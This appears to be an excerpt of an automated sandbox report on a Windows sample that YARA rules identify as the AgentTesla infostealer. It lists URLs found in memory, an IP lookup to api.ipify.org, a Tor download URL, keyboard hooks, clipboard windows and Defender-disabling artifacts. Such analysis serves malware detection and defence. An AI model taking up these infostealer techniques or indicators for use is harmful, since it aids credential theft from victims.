              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273916785.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd&-c
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd--
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdH-u
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdf
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271886008.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271614897.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271964358.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271209683.0000000005A51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.271153816.0000000005A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrita
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comml-Y
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272335142.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comoitu
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273496235.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273102970.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272466078.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273306720.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273005972.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.272565753.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273220976.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comrsiv_-l
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.316302127.0000000005A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coms-P
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264791589.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.265019576.0000000005A59000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264911934.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.264791589.0000000005A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/d
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274806173.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.274751062.0000000005A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm2
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269800007.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/&-c
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/--
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/;-
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/H-u
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/P
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y001
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_-l
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269749174.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270013809.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268864547.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269636094.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269244387.0000000005A53000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269116939.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269843779.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269945334.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269536974.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269576221.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269468103.0000000005A54000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269037859.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269366094.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269800007.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.269305227.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/&-c
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/--
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s-P
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268506637.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267565316.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268654675.0000000005A4F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.268296688.0000000005A55000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267000618.0000000005A43000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.267904029.0000000005A55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273210069.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.270890643.0000000005A4A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273089223.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273295422.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.273089223.0000000005A48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deeg
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.341560116.0000000006C52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000003.265582317.0000000005A57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
              Source: nrQtAokXKaSn.exe, 00000010.00000002.538774344.0000000002B2F000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539333299.0000000002B6A000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.539499206.0000000002B7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://OPBeIPZ8XbJqLOvY6X.net
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgmail.strictfacilityservices.comaccounts
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 0000000B.00000002.531415625.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 00000010.00000002.532462363.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
              Source: unknownDNS traffic detected: queries for: api.ipify.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.6:49720 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeWindow created: window name: CLIPBRDWNDCLASS
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exeWindow created: window name: CLIPBRDWNDCLASS

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.2cfbae8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 11.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 12.2.nrQtAokXKaSn.exe.2b4ba4c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3e33c90.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.3d89440.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
